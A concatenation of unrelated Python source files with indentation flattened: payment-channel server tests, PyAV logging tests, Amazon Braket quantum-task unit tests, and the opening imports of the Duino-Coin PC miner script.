# Seed the database with activity in Channel B
cust_wallet._private_key = PrivateKey.from_random()
test_client_b = _create_client_txs()
deposit_txid_b = channel_server.open(test_client_b.deposit_tx, test_client_b.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid_b, test_client_b.payment_tx)
amount = channel_server.redeem(payment_txid)
payment_tx1 = _create_client_payment(test_client_b, 2)
payment_tx2 = _create_client_payment(test_client_b, 3)
payment_tx3 = _create_client_payment(test_client_b, 4)
payment_txid1 = channel_server.receive_payment(deposit_txid_b, payment_tx1)
payment_txid2 = channel_server.receive_payment(deposit_txid_b, payment_tx2)
payment_txid3 = channel_server.receive_payment(deposit_txid_b, payment_tx3)
amount1 = channel_server.redeem(payment_txid1)
amount2 = channel_server.redeem(payment_txid3)
amount3 = channel_server.redeem(payment_txid2)
assert amount1 == TEST_PMT_AMOUNT
assert amount2 == TEST_PMT_AMOUNT
assert amount3 == TEST_PMT_AMOUNT
# Both channels should be `ready` since our channel is zeroconf by default
channels = channel_server._db.pc.lookup()
assert channels, 'Channel lookup with no args should return a list of all channels.'
for channel in channels:
assert channel.state == ChannelSQLite3.READY, 'Channel should be READY.'
# Change Channel A to `confirming` for testing purposes
channel_server._db.pc.update_state(deposit_txid_a, ChannelSQLite3.CONFIRMING)
test_state = channel_server._db.pc.lookup(deposit_txid_a).state
assert test_state == ChannelSQLite3.CONFIRMING, 'Channel should be CONFIRMING'
# Change Channel B's expiration to be very close to allowable expiration
new_expiry = int(time.time() + 3600)
update = 'UPDATE payment_channel SET expires_at=? WHERE deposit_txid=?'
channel_server._db.pc.c.execute(update, (new_expiry, deposit_txid_b))
channel_server._db.pc.c.connection.commit()
test_expiry = channel_server._db.pc.lookup(deposit_txid_b).expires_at
assert test_expiry == new_expiry, 'Channel should closing soon.'
# Sync all of the server's payment channels
channel_server.sync()
# Test that Channel A is `ready` after a sync
test_state = channel_server._db.pc.lookup(deposit_txid_a).state
assert test_state == ChannelSQLite3.READY, 'Channel should be READY'
# Test that Channel B is `closed` after a sync
test_state = channel_server._db.pc.lookup(deposit_txid_b).state
assert test_state == ChannelSQLite3.CLOSED, 'Channel should be CLOSED'
# Test that Channel B payment is fully signed after a sync
test_payment = channel_server._db.pc.lookup(deposit_txid_b).payment_tx
goodsig_1 = Script.validate_template(test_payment.inputs[0].script, [bytes, bytes, 'OP_1', bytes])
goodsig_true = Script.validate_template(test_payment.inputs[0].script, [bytes, bytes, 'OP_TRUE', bytes])
assert goodsig_1 or goodsig_true, 'Payment should be in a fully signed format'
# Test that Channel A remains `ready` after another sync
channel_server.sync()
test_state = channel_server._db.pc.lookup(deposit_txid_a).state
assert test_state == ChannelSQLite3.READY, 'Channel should be READY'
# Modify `lookup_spend_txid` to return a txid, as if the tx were spent
monkeypatch.setattr(MockBlockchain, 'lookup_spend_txid', mock_lookup_spent_txid)
# Test that Channel A is `closed` after a sync where it finds a spent txid
channel_server.sync()
test_state = channel_server._db.pc.lookup(deposit_txid_a).state
assert test_state == ChannelSQLite3.CLOSED, 'Channel should be CLOSED'
def test_channel_low_balance_message():
"""Test that the channel server returns a useful error when the balance is low."""
channel_server._db = DatabaseSQLite3(':memory:', db_dir='')
test_client = _create_client_txs()
# Open the channel and make a payment
deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
channel_server.redeem(payment_txid)
# Create a payment that almost completely drains the channel
payment_tx2 = _create_client_payment(test_client, 17)
payment_txid2 = channel_server.receive_payment(deposit_txid, payment_tx2)
channel_server.redeem(payment_txid2)
# Make a payment that spends more than the remaining channel balance
payment_tx3 = _create_client_payment(test_client, 18)
with pytest.raises(BadTransactionError) as exc:
channel_server.receive_payment(deposit_txid, payment_tx3)
assert 'Payment channel balance' in str(exc)
# Test that channel close succeeds
good_signature = codecs.encode(cust_wallet._private_key.sign(deposit_txid).to_der(), 'hex_codec')
closed = channel_server.close(deposit_txid, good_signature)
assert closed
def test_channel_redeem_race_condition():
"""Test ability lock multiprocess redeems."""
# Clear test database
multiprocess_db = '/tmp/bitserv_test.sqlite3'
with open(multiprocess_db, 'w') as f:
f.write('')
# Initialize test vectors
channel_server._db = DatabaseSQLite3(multiprocess_db)
test_client = _create_client_txs()
deposit_txid = channel_server.open(test_client.deposit_tx, test_client.redeem_script)
payment_txid = channel_server.receive_payment(deposit_txid, test_client.payment_tx)
# Cache channel result for later
channel = channel_server._db.pc.lookup(deposit_txid)
# This is a function that takes a long time
def delayed_pc_lookup(deposit_txid):
time.sleep(0.5)
return channel
# This is the normal function
def normal_pc_lookup(deposit_txid):
return channel
# This function is called between the first lookup and the final record update
# We make sure this function takes extra long the first time its called
# in order to expose the race condition
channel_server._db.pc.lookup = delayed_pc_lookup
# Start the first redeem in its own process and allow time to begin
p = multiprocessing.Process(target=channel_server.redeem, args=(payment_txid,))
p.start()
time.sleep(0.1)
# After starting the first redeem, reset the function to take a normal amount of time
channel_server._db.pc.lookup = normal_pc_lookup
# To test the race, this redeem is called while the other redeem is still in-process
# Because this call makes it to the final database update first, it should be successful
channel_server.redeem(payment_txid)
# The multiprocess redeem is intentionally made slow, and will finish after the redeem above
# Because of this, the multiprocess redeem should throw and exception and exit with an error
p.join()
assert p.exitcode == 1
|
test_logging.py | from __future__ import division
import errno
import logging
import threading
import av.error
import av.logging
from .common import TestCase
def do_log(message):
av.logging.log(av.logging.INFO, 'test', message)
class TestLogging(TestCase):
def test_adapt_level(self):
self.assertEqual(
av.logging.adapt_level(av.logging.ERROR),
logging.ERROR
)
self.assertEqual(
av.logging.adapt_level(av.logging.WARNING),
logging.WARNING
)
self.assertEqual(
av.logging.adapt_level((av.logging.WARNING + av.logging.ERROR) // 2),
logging.WARNING
)
def test_threaded_captures(self):
with av.logging.Capture(local=True) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
def test_global_captures(self):
with av.logging.Capture(local=False) as logs:
do_log('main')
thread = threading.Thread(target=do_log, args=('thread', ))
thread.start()
thread.join()
self.assertIn((av.logging.INFO, 'test', 'main'), logs)
self.assertIn((av.logging.INFO, 'test', 'thread'), logs)
def test_repeats(self):
with av.logging.Capture() as logs:
do_log('foo')
do_log('foo')
do_log('bar')
do_log('bar')
do_log('bar')
do_log('baz')
logs = [log for log in logs if log[1] == 'test']
self.assertEqual(logs, [
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'foo'),
(av.logging.INFO, 'test', 'bar'),
(av.logging.INFO, 'test', 'bar (repeated 2 more times)'),
(av.logging.INFO, 'test', 'baz'),
])
def test_error(self):
log = (av.logging.ERROR, 'test', 'This is a test.')
av.logging.log(*log)
try:
av.error.err_check(-errno.EPERM)
except OSError as e:
self.assertEqual(e.log, log)
else:
self.fail()
|
test_aws_quantum_task.py | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import asyncio
import json
import threading
import time
from unittest.mock import MagicMock, Mock, patch
import pytest
from common_test_utils import MockS3
from jsonschema import validate
from braket.annealing.problem import Problem, ProblemType
from braket.aws import AwsQuantumTask
from braket.aws.aws_quantum_task import _create_annealing_device_params
from braket.aws.aws_session import AwsSession
from braket.circuits import Circuit
from braket.device_schema import GateModelParameters
from braket.device_schema.dwave import (
Dwave2000QDeviceParameters,
DwaveAdvantageDeviceParameters,
DwaveDeviceParameters,
)
from braket.device_schema.ionq import IonqDeviceParameters
from braket.device_schema.rigetti import RigettiDeviceParameters
from braket.device_schema.simulators import GateModelSimulatorDeviceParameters
from braket.tasks import AnnealingQuantumTaskResult, GateModelQuantumTaskResult
S3_TARGET = AwsSession.S3DestinationFolder("foo", "bar")
IONQ_ARN = "device/qpu/ionq"
RIGETTI_ARN = "device/qpu/rigetti"
SIMULATOR_ARN = "device/quantum-simulator"
DEVICE_PARAMETERS = [
(IONQ_ARN, IonqDeviceParameters),
(RIGETTI_ARN, RigettiDeviceParameters),
(SIMULATOR_ARN, GateModelSimulatorDeviceParameters),
]
@pytest.fixture
def aws_session():
mock = Mock()
_mock_metadata(mock, "RUNNING")
return mock
@pytest.fixture
def quantum_task(aws_session):
return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)
@pytest.fixture
def circuit_task(aws_session):
return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)
@pytest.fixture
def annealing_task(aws_session):
return AwsQuantumTask("foo:bar:arn", aws_session, poll_timeout_seconds=2)
@pytest.fixture
def arn():
return "foo:bar:arn"
@pytest.fixture
def circuit():
return Circuit().h(0).cnot(0, 1)
@pytest.fixture
def problem():
return Problem(ProblemType.ISING, linear={1: 3.14}, quadratic={(1, 2): 10.08})
def test_equality(arn, aws_session):
quantum_task_1 = AwsQuantumTask(arn, aws_session)
quantum_task_2 = AwsQuantumTask(arn, aws_session)
other_quantum_task = AwsQuantumTask("different:arn", aws_session)
non_quantum_task = quantum_task_1.id
assert quantum_task_1 == quantum_task_2
assert quantum_task_1 is not quantum_task_2
assert quantum_task_1 != other_quantum_task
assert quantum_task_1 != non_quantum_task
def test_str(quantum_task):
expected = "AwsQuantumTask('id/taskArn':'{}')".format(quantum_task.id)
assert str(quantum_task) == expected
def test_hash(quantum_task):
assert hash(quantum_task) == hash(quantum_task.id)
def test_id_getter(arn, aws_session):
quantum_task = AwsQuantumTask(arn, aws_session)
assert quantum_task.id == arn
@pytest.mark.xfail(raises=AttributeError)
def test_no_id_setter(quantum_task):
quantum_task.id = 123
def test_metadata(quantum_task):
metadata_1 = {"status": "RUNNING"}
quantum_task._aws_session.get_quantum_task.return_value = metadata_1
assert quantum_task.metadata() == metadata_1
quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
metadata_2 = {"status": "COMPLETED"}
quantum_task._aws_session.get_quantum_task.return_value = metadata_2
assert quantum_task.metadata(use_cached_value=True) == metadata_1
def test_metadata_call_if_none(quantum_task):
metadata_1 = {"status": "RUNNING"}
quantum_task._aws_session.get_quantum_task.return_value = metadata_1
assert quantum_task.metadata(use_cached_value=True) == metadata_1
quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
def test_state(quantum_task):
state_1 = "RUNNING"
_mock_metadata(quantum_task._aws_session, state_1)
assert quantum_task.state() == state_1
quantum_task._aws_session.get_quantum_task.assert_called_with(quantum_task.id)
state_2 = "COMPLETED"
_mock_metadata(quantum_task._aws_session, state_2)
assert quantum_task.state(use_cached_value=True) == state_1
state_3 = "FAILED"
_mock_metadata(quantum_task._aws_session, state_3)
assert quantum_task.state() == state_3
state_4 = "CANCELLED"
_mock_metadata(quantum_task._aws_session, state_4)
assert quantum_task.state() == state_4
def test_cancel(quantum_task):
future = quantum_task.async_result()
assert not future.done()
quantum_task.cancel()
assert quantum_task.result() is None
assert future.cancelled()
quantum_task._aws_session.cancel_quantum_task.assert_called_with(quantum_task.id)
def test_cancel_without_fetching_result(quantum_task):
quantum_task.cancel()
assert quantum_task.result() is None
assert quantum_task._future.cancelled()
quantum_task._aws_session.cancel_quantum_task.assert_called_with(quantum_task.id)
def asyncio_get_event_loop_side_effect(*args, **kwargs):
yield ValueError("unit-test-exception")
mock = MagicMock()
while True:
yield mock
@patch("braket.aws.aws_quantum_task.asyncio")
def test_initialize_asyncio_event_loop_if_required(mock_asyncio, quantum_task):
mock_asyncio.get_event_loop.side_effect = asyncio_get_event_loop_side_effect()
mock_asyncio.set_event_loop.return_value = MagicMock()
mock_asyncio.new_event_loop.return_value = MagicMock()
quantum_task._get_future()
assert mock_asyncio.get_event_loop.call_count == 2
assert mock_asyncio.set_event_loop.call_count == 1
assert mock_asyncio.new_event_loop.call_count == 1
def test_result_circuit(circuit_task):
_mock_metadata(circuit_task._aws_session, "COMPLETED")
_mock_s3(circuit_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
expected = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
assert circuit_task.result() == expected
s3_bucket = circuit_task.metadata()["outputS3Bucket"]
s3_object_key = circuit_task.metadata()["outputS3Directory"]
circuit_task._aws_session.retrieve_s3_object_body.assert_called_with(
s3_bucket, f"{s3_object_key}/results.json"
)
def test_result_annealing(annealing_task):
_mock_metadata(annealing_task._aws_session, "COMPLETED")
_mock_s3(annealing_task._aws_session, MockS3.MOCK_S3_RESULT_ANNEALING)
expected = AnnealingQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_ANNEALING)
assert annealing_task.result() == expected
s3_bucket = annealing_task.metadata()["outputS3Bucket"]
s3_object_key = annealing_task.metadata()["outputS3Directory"]
annealing_task._aws_session.retrieve_s3_object_body.assert_called_with(
s3_bucket, f"{s3_object_key}/results.json"
)
@pytest.mark.xfail(raises=TypeError)
def test_result_invalid_type(circuit_task):
_mock_metadata(circuit_task._aws_session, "COMPLETED")
_mock_s3(circuit_task._aws_session, json.dumps(MockS3.MOCK_TASK_METADATA))
circuit_task.result()
def test_result_circuit_cached(circuit_task):
_mock_metadata(circuit_task._aws_session, "COMPLETED")
expected = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
circuit_task._result = expected
assert circuit_task.result() == expected
assert not circuit_task._aws_session.retrieve_s3_object_body.called
def test_no_result(circuit_task):
_mock_metadata(circuit_task._aws_session, "FAILED")
circuit_task._result = None
assert circuit_task.result() is None
assert not circuit_task._aws_session.retrieve_s3_object_body.called
@pytest.mark.parametrize(
"result_string",
[MockS3.MOCK_S3_RESULT_GATE_MODEL, MockS3.MOCK_S3_RESULT_GATE_MODEL_WITH_RESULT_TYPES],
)
def test_result_cached_future(circuit_task, result_string):
_mock_metadata(circuit_task._aws_session, "COMPLETED")
_mock_s3(circuit_task._aws_session, result_string)
circuit_task.result()
_mock_s3(circuit_task._aws_session, "")
expected = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
assert circuit_task.result() == expected
@pytest.mark.parametrize(
"status, result",
[
("COMPLETED", GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)),
("FAILED", None),
],
)
def test_async_result(circuit_task, status, result):
def set_result_from_callback(future):
# Set the result_from_callback variable in the enclosing functions scope
nonlocal result_from_callback
result_from_callback = future.result()
_mock_metadata(circuit_task._aws_session, "RUNNING")
_mock_s3(circuit_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
future = circuit_task.async_result()
# test the different ways to get the result from async
# via callback
result_from_callback = None
future.add_done_callback(set_result_from_callback)
# via asyncio waiting for result
_mock_metadata(circuit_task._aws_session, status)
event_loop = asyncio.get_event_loop()
result_from_waiting = event_loop.run_until_complete(future)
# via future.result(). Note that this would fail if the future is not complete.
result_from_future = future.result()
assert result_from_callback == result
assert result_from_waiting == result
assert result_from_future == result
def test_failed_task(quantum_task):
_mock_metadata(quantum_task._aws_session, "FAILED")
_mock_s3(quantum_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
result = quantum_task.result()
assert result is None
def test_timeout_completed(aws_session):
_mock_metadata(aws_session, "RUNNING")
_mock_s3(aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
# Setup the poll timing such that the timeout will occur after one API poll
quantum_task = AwsQuantumTask(
"foo:bar:arn",
aws_session,
poll_timeout_seconds=0.5,
poll_interval_seconds=1,
)
assert quantum_task.result() is None
_mock_metadata(aws_session, "COMPLETED")
assert quantum_task.state() == "COMPLETED"
assert quantum_task.result() == GateModelQuantumTaskResult.from_string(
MockS3.MOCK_S3_RESULT_GATE_MODEL
)
# Cached status is still COMPLETED, so result should be fetched
_mock_metadata(aws_session, "RUNNING")
quantum_task._result = None
assert quantum_task.result() == GateModelQuantumTaskResult.from_string(
MockS3.MOCK_S3_RESULT_GATE_MODEL
)
def test_timeout_no_result_terminal_state(aws_session):
_mock_metadata(aws_session, "RUNNING")
_mock_s3(aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
# Setup the poll timing such that the timeout will occur after one API poll
quantum_task = AwsQuantumTask(
"foo:bar:arn",
aws_session,
poll_timeout_seconds=0.5,
poll_interval_seconds=1,
)
assert quantum_task.result() is None
_mock_metadata(aws_session, "FAILED")
assert quantum_task.result() is None
@pytest.mark.xfail(raises=ValueError)
def test_create_invalid_s3_folder(aws_session, arn, circuit):
AwsQuantumTask.create(aws_session, arn, circuit, ("bucket",), 1000)
@pytest.mark.xfail(raises=TypeError)
def test_create_invalid_task_specification(aws_session, arn):
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
AwsQuantumTask.create(aws_session, arn, "foo", S3_TARGET, 1000)
@pytest.mark.parametrize("device_arn,device_parameters_class", DEVICE_PARAMETERS)
def test_from_circuit_with_shots(device_arn, device_parameters_class, aws_session, circuit):
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
shots = 53
task = AwsQuantumTask.create(aws_session, device_arn, circuit, S3_TARGET, shots)
assert task == AwsQuantumTask(mocked_task_arn, aws_session)
_assert_create_quantum_task_called_with(
aws_session,
device_arn,
circuit,
S3_TARGET,
shots,
device_parameters_class(
paradigmParameters=GateModelParameters(
qubitCount=circuit.qubit_count, disableQubitRewiring=False
)
),
)
@pytest.mark.parametrize(
"device_arn,device_parameters_class", [(RIGETTI_ARN, RigettiDeviceParameters)]
)
def test_from_circuit_with_disabled_rewiring(
device_arn, device_parameters_class, aws_session, circuit
):
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
shots = 53
task = AwsQuantumTask.create(
aws_session, device_arn, circuit, S3_TARGET, shots, disable_qubit_rewiring=True
)
assert task == AwsQuantumTask(mocked_task_arn, aws_session)
_assert_create_quantum_task_called_with(
aws_session,
device_arn,
circuit,
S3_TARGET,
shots,
device_parameters_class(
paradigmParameters=GateModelParameters(
qubitCount=circuit.qubit_count, disableQubitRewiring=True
)
),
)
@pytest.mark.parametrize(
"device_arn,device_parameters_class", [(RIGETTI_ARN, RigettiDeviceParameters)]
)
def test_from_circuit_with_verbatim(device_arn, device_parameters_class, aws_session):
circ = Circuit().add_verbatim_box(Circuit().h(0))
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
shots = 1337
task = AwsQuantumTask.create(
aws_session,
device_arn,
circ,
S3_TARGET,
shots,
disable_qubit_rewiring=True,
)
assert task == AwsQuantumTask(mocked_task_arn, aws_session)
_assert_create_quantum_task_called_with(
aws_session,
device_arn,
circ,
S3_TARGET,
shots,
device_parameters_class(
paradigmParameters=GateModelParameters(
qubitCount=circ.qubit_count, disableQubitRewiring=True
)
),
)
@pytest.mark.xfail(raises=ValueError)
def test_from_circuit_with_verbatim_qubit_rewiring_not_disabled(aws_session):
circ = Circuit().add_verbatim_box(Circuit().h(0))
shots = 57
AwsQuantumTask.create(aws_session, RIGETTI_ARN, circ, S3_TARGET, shots)
@pytest.mark.xfail(raises=ValueError)
def test_from_circuit_with_shots_value_error(aws_session, arn, circuit):
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
AwsQuantumTask.create(aws_session, arn, circuit, S3_TARGET, 0)
@pytest.mark.parametrize(
"device_parameters,arn",
[
(
{
"providerLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
"arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
),
(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"beta": 0.2,
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
"arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
),
pytest.param(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"beta": 0.2,
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
"arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
# this doesn't fail... yet
# marks=pytest.mark.xfail(reason='beta not a valid parameter for Advantage device'),
),
pytest.param(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"beta": 0.2,
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
"arn:aws:braket:::device/qpu/d-wave/fake_arn",
marks=pytest.mark.xfail(reason="Bad ARN"),
),
(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
"arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
),
(
DwaveDeviceParameters.parse_obj(
{
"providerLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
}
),
"arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
),
(
DwaveDeviceParameters.parse_obj(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
),
"arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
),
(
DwaveAdvantageDeviceParameters.parse_obj(
{
"deviceLevelParameters": {
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
},
),
"arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
),
(
Dwave2000QDeviceParameters.parse_obj(
{
"deviceLevelParameters": {
"postprocessingType": "OPTIMIZATION",
"annealingOffsets": [3.67, 6.123],
"annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
"annealingDuration": 1,
"autoScale": False,
"beta": 0.2,
"chains": [[0, 1, 5], [6]],
"compensateFluxDrift": False,
"fluxBiases": [1.1, 2.2, 3.3, 4.4],
"initialState": [1, 3, 0, 1],
"maxResults": 1,
"programmingThermalizationDuration": 625,
"readoutThermalizationDuration": 256,
"reduceIntersampleCorrelation": False,
"reinitializeState": True,
"resultFormat": "RAW",
"spinReversalTransformCount": 100,
}
}
),
"arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
),
(
Dwave2000QDeviceParameters.parse_obj({"deviceLevelParameters": {}}),
"arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
),
pytest.param(
{},
"arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
),
],
)
def test_from_annealing(device_parameters, aws_session, arn, problem):
mocked_task_arn = "task-arn-1"
aws_session.create_quantum_task.return_value = mocked_task_arn
task = AwsQuantumTask.create(
aws_session,
arn,
problem,
S3_TARGET,
1000,
device_parameters=device_parameters,
)
assert task == AwsQuantumTask(mocked_task_arn, aws_session)
annealing_parameters = _create_annealing_device_params(device_parameters, device_arn=arn)
validate(
json.loads(annealing_parameters.json(exclude_none=True)), annealing_parameters.schema()
)
_assert_create_quantum_task_called_with(
aws_session,
arn,
problem,
S3_TARGET,
1000,
annealing_parameters,
)
@pytest.mark.parametrize("device_arn,device_parameters_class", DEVICE_PARAMETERS)
def test_create_with_tags(device_arn, device_parameters_class, aws_session, circuit):
mocked_task_arn = "task-arn-tags"
aws_session.create_quantum_task.return_value = mocked_task_arn
shots = 53
tags = {"state": "washington"}
task = AwsQuantumTask.create(aws_session, device_arn, circuit, S3_TARGET, shots, tags=tags)
assert task == AwsQuantumTask(mocked_task_arn, aws_session)
_assert_create_quantum_task_called_with(
aws_session,
device_arn,
circuit,
S3_TARGET,
shots,
device_parameters_class(
paradigmParameters=GateModelParameters(qubitCount=circuit.qubit_count)
),
tags,
)
def test_init_new_thread(aws_session, arn):
tasks_list = []
threading.Thread(target=_init_and_add_to_list, args=(aws_session, arn, tasks_list)).start()
time.sleep(0.1)
assert len(tasks_list) == 1
@patch("braket.aws.aws_quantum_task.boto3.Session")
def test_aws_session_for_task_arn(mock_session):
region = "us-west-2"
arn = f"arn:aws:aqx:{region}:account_id:quantum-task:task_id"
mock_boto_session = Mock()
mock_session.return_value = mock_boto_session
mock_boto_session.region_name = region
aws_session = AwsQuantumTask._aws_session_for_task_arn(arn)
mock_session.assert_called_with(region_name=region)
assert aws_session.boto_session == mock_boto_session
def _init_and_add_to_list(aws_session, arn, task_list):
task_list.append(AwsQuantumTask(arn, aws_session))
def _assert_create_quantum_task_called_with(
aws_session, arn, task_description, s3_results_prefix, shots, device_parameters, tags=None
):
test_kwargs = {
"deviceArn": arn,
"outputS3Bucket": s3_results_prefix[0],
"outputS3KeyPrefix": s3_results_prefix[1],
"action": task_description.to_ir().json(),
"deviceParameters": device_parameters.json(exclude_none=True),
"shots": shots,
}
if tags is not None:
test_kwargs.update({"tags": tags})
aws_session.create_quantum_task.assert_called_with(**test_kwargs)
def _mock_metadata(aws_session, state):
aws_session.get_quantum_task.return_value = {
"status": state,
"outputS3Bucket": S3_TARGET.bucket,
"outputS3Directory": S3_TARGET.key,
}
def _mock_s3(aws_session, result):
aws_session.retrieve_s3_object_body.return_value = result
|
PC_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin PC Miner (v1.5)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © revox, MrKris7100 2020
##########################################
import socket, statistics, threading, time, random, re, subprocess, hashlib, platform, getpass, configparser, sys, datetime, os, signal # Import libraries
from decimal import Decimal
from pathlib import Path
from signal import signal, SIGINT
try: # Check if cpuinfo is installed
import cpuinfo
from multiprocessing import freeze_support
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Cpuinfo is not installed. Please install it using: python3 -m pip install py-cpuinfo.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
time.sleep(15)
os._exit(1)
try: # Check if colorama is installed
from colorama import init, Fore, Back, Style
except:
now = datetime.datetime.now()
